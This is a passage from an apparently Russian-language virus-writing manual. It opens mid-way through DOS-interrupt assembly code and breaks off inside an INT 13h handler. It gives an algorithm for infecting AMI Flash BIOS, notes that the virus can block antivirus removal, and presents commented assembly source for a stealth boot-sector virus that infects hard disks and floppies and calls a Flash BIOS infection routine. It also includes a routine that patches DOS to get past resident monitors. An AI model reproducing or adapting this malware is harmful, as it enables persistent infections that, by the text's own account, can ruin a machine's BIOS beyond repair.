mov Seg21,es

ret

;Таблица позиций 2A и 2.

Table dw 0FF03h, 5333h,0FF03h, 420Ah

dw 0

SetAdr endp

;Процедура прямого обращения к DOS

CallDOS proc near

;Если функция безопасна, вызываем прерывание обычным способом

cmp ah,3Bh

jb Trivial

cmp ah,42h

ja Trivial

;Заменяем вызов прерывания 2Аh на две команды NOP (9090h)

;в обработчике DOS, предварительно

;сохранив первоначальные значения кода

push es

push ax

push bx

mov es,cs:Ofs2A

mov bx,cs:Seg2A

mov ax,es:[bx]

mov cs:Save, ax

mov es:[bx], 9090h

pop bx

pop ax

pop es

;Вызываем напрямую прерывание DOS

pushf

call cs:dword ptr Ofs21

;Восстанавливаем вызов 2Аh

push es

push ax

push bx

mov es,cs:Ofs2A

mov bx,cs:Seg2A

mov ax,cs:Save

mov es:[bx], ax

pop bx

pop ax

pop es

ret

;Обычное обращение к DOS (используется для безопасных функций)

Trivial:

int 21h

ret

;В этом месте сохраняем значение для кода вызова INT 2Ah

Save dw ?

;Обработчик прерывания DOS

Ofs21 dw ?

Seg21 dw ?

;Адрес вызова INT 2Ah из обработчика DOS

Ofs2A dw ?

Seg2A dw ?

CallDOS endp

Flash BIOS

Новое место для вирусов

Flash-память – энергонезависимая память, которая обеспечивает работоспособность EPROM со встроенной электрической схемой стирания и перепрограммирования. Энергонезависимая память отличается от RAM тем, что она не обнуляется при отсутствии напряжения.

Flash BIOS – Flash-память, которая используется для хранения кода BIOS. Она может быть перепрограммирована – это предусмотрено для облегчения обновления BIOS. Такие микросхемы применяются в 90 % портативных компьютеров, в большинстве компьютеров 486DX2, 486DX4, Pentium.

Как известно, BIOS получает управление при запуске компьютера. Все что нужно сделать вирмейкеру – это незаметно модифицировать BIOS, чтобы вирус стартовал перед загрузкой системы компьютера.

AMI Flash вирус

Алгоритм работы вируса:

1. Проверить компьютер на наличие Flash BIOS;

2. Проверить Flash BIOS на зараженность (осуществить выход, если она заражена);

3. Считать вектор INT 19h из таблицы (прерывание загрузки);

4. Прочесть первые 5 байт от точки входа INT 19h;

5. Проверить BIOS на наличие свободного места для размещения вируса (поиск области нулей);

6. Установить память Flash BIOS в режим записи (обычно она находится в режиме «ReadOnly»);

7. Записать вирус в найденную область нулей;

8. Записать переход на вирус в точку входа INT 19h;

9. Восстановить режим «ReadOnly» для памяти Flash BIOS.

Единственное предназначение INT 19h – быть вызванным в процессе загрузки, чтобы загрузить boot-сектор в память и передать ему управление. Прерывание именно то, которое и требуется изменить.

Нужно иметь в виду, что одновременно читать из памяти Flash BIOS и записывать в нее нельзя. Поэтому во время работы вируса нельзя использовать временные переменные в этой памяти. Более целесообразным является создание вируса для обычного boot-сектора. Этот вирус следует поместить в конец памяти и оттуда устанавливать вектор INT 13h.

AMI BIOS обладает своими специфическими особенностями при размещении в микросхемах Flash-памяти, которые базируются на использовании функции E0h прерывания INT 16h. Самое интересное состоит в том, что однажды внесенный в эту память вирус может запретить повторно использовать указанную функцию. Это запретит антивирусным программам воспользоваться ею в процессе удаления вируса из BIOS компьютера. Исходя из этого, авторам антивирусных программ придется трассировать INT 16h, чтобы получить оригинальный вектор.

Исходный текст вируса, заражающего Flash BIOS.

;Вирус, заражающий Flash BIOS.

;Если на компьютере есть Flash BIOS, имеется шанс, что его могут

;серьезно испортить. Если BIOS изменится, это может привести

;к неприятностям. Нельзя будет загрузиться даже с ”чистой”

;дискеты. Зараженный чип в рабочее состояние не вернуть.

org 0

;При входе в boot−сектор DL=загрузочный диск

mov si,7C00h

;Установим 0000h в регистрах DS и ES

xor ax,ax

mov es,ax

mov ds,ax

;Установим значение стека 0000h:7C00h

cli

mov ss,ax

mov sp,si

sti

;Уменьшим на 1Кбайт память (0040h:0013h)

dec word ptr [0413h]

;Получим размер памяти (при возврате в AX)

int 12h

;Так как размер памяти указан в килобайтах (1024 байт), а нужно

;в параграфах (16 байт), умножим его на 64, что эквивалентно

;сдвигу на 6 разрядов влево

mov cl,6

shl ax,cl

;Установим новый сегмент вируса (вершина памяти)

mov es,ax

;Перенесем вирусный сектор в вершину памяти

xor di,di

mov cx,200h

cld

rep movsb

;Сохраним вектор прерывания INT 13h. Поскольку этот вирус

;загрузился до загрузки DOS, то прерывание INT 21h еще не

;работает – работаем с вектором прерывания прямо в таблице

mov ax,word ptr [13h*4]

mov word ptr es:[offset i13],ax

mov ax,word ptr [13h*4+2]

mov word ptr es:[offset i13+2],ax

;Установим новый вектор прерывания INT 13h

mov word ptr [13h*4],offset Handler

mov word ptr [13h*4+2],es

;Переходим в точку ES:Restart (в копии вируса,

;находящейся в вершине памяти)

already_resident:

push es

mov ax,offset Restart

push ax

retf

;С этого места программа работает уже в вершине памяти

Restart:

;Загружаем оригинальный boot−сектор из конца

;root directory и передаем ему управление.

;Сброс дисковой подсистемы (перед работой

;с дисковой подсистемой надо выполнить

;функцию 00h прерывания INT 13h)

xor ax,ax

call int13h

;Подготовим регистры для загрузки оригинального boot−сектора

xor ax,ax

mov es,ax ;Сегмент для загрузки

mov bx,7C00h ;Смещение для загрузки

mov cx,0002h ;Дорожка 0, сектор 2

xor dh,dh ;Головка 0

mov ax,0201h ;Функция 2, количество секторов 1

;Проверим диск, с которого грузимся. 80h и выше – жесткий диск,

;иначе – дискета. Копия оригинального boot−сектора хранится

;в разных местах: на жестком диске – дорожка 0, головка 0, сектор 2;

;на дискете – дорожка 0, головка 1, сектор 14

cmp dl,80h

jae MBR_Loader

;Грузимся с дискеты: изменим сектор и головку

mov cl,14 ;Сектор 14

mov dh,1 ;Головка 1

;Загрузим оригинальный boot−сектор по адресу 0000h:7C00h

MBR_Loader:

call int13h

;Сохраним в стеке номер диска, с которого грузимся

push dx

;Проверим, заражен ли Flash BIOS

cmp byte ptr cs:flash_done,1

je Flash_resident

;Заразим Flash BIOS

call flash_BIOS

;Восстановим из стека DX (номер загрузочного диска)

Flash_resident:

pop dx

;Запускаем оригинальный boot−сектор (JMP FAR 0000h:7C00h)

db 0EAh

dw 7C00h

dw 0

;Сюда попадаем, когда происходит чтение boot−сектора. Скрываем

;присутствие вируса методом чтения оригинального boot−сектора

Stealth:

;Установим значения сектора, где хранится копия оригинального

;boot−сектора

mov cx,02h

mov ax,0201h

;Проверим, откуда считан boot−сектор (дискета или жесткий диск),

;так как копии хранятся в разных местах

cmp dl,80h

jae hd_stealth

mov cl,14

mov dh,1

hd_stealth:

;Прочтем копию оригинального boot−сектора. Так как

;номера секторов подменены, фактически ”копия выдается

;за оригинал” – скрываем свое присутствие (Stealth).

call int13h

;Выходим из обработчика прерывания

jmp pop_exit

;Проверка наличия резидентного вируса – ответим:

;запрос INT 13h (AX=ABBAh), ответ AX=BAABh

res_test:

xchg ah,al

iret

;Обработчик прерывания INT 13h

Handler:

;Если при вызове в AX находится ABBAh,

;значит это проверка наличия резидентного вируса

cmp ax,0ABBAh

je res_test

;Перехватываем только функцию 02h (чтение сектора): проверяем

;номер функции. Если не 2, запускаем оригинальный обработчик

cmp ah,2

jne jend

;Проверяем номера дорожки и сектора, интересуясь только теми

;секторами, в которых может оказаться вирус –

;дорожка 0, головка 0, сектор 1

cmp cx,1

jne jend

;Проверим номер головки. Если не 0, то запустим

;оригинальный обработчик

cmp dh,0

jne jend

try_infect:

;Считаем сектор в буфер (для дальнейшей обработки).

;Для этого вызовем оригинальный INT 13h

call int13h

jc jend

;Сохраним регистры и флаги (обработчик не должен изменить их)

pushf

push ax

push bx

push cx

push dx

push si

push di

push es

push ds

;Проверяем, заражен ли данный диск вирусом: читаем сигнатуру.

;Если диск заражен, скрываем присутствие вируса

cmp word ptr es:[bx+offset marker],”LV”

je stealth

;Если диск не заражен, то заражаем: проверим, откуда загружен

;boot−сектор (с дискеты или с жесткого диска)

cmp dl,80h

jb infect_floppy

;Установим номера дорожки, головки и сектора для жесткого

;диска для сохранения оригинального boot−сектора

mov cx,2

xor dh,dh

jmp write_virus

Infect_Floppy:

;Установим номера дорожки, головки и сектора для дискеты

;для сохранения оригинального boot−сектора

mov cx,14

mov dh,1

Write_Virus:

;Записываем оригинальный boot−сектор

mov ax,0301h

call int13h

jc pop_exit

;Установим сегментный регистр ES на сегмент с вирусом

push cs

pop es

;Сбросим флаг зараженности Flash BIOS

mov byte ptr cs:flash_done,0

;Запишем тело вируса в boot−сектор

xor bx,bx

mov ax,0301h

mov cx,0001h

xor dh,dh

call int13h

;Восстановим регистры и флаги (как раз те их значения, которые

;свидетельствует о том, что boot−сектор только что считали)

Pop_Exit:

pop ds

pop es

pop di

pop si

pop dx

pop cx

pop bx

pop ax

popf

;Выходим из обработчика в вызывающую программу

retf 2

;Запуск оригинального обработчика

jend:

DD 0EAh ;Код команды JMP FAR

;Оригинальный вектор INT13h

i13 DD 0

;Вызов прерывания INT 13h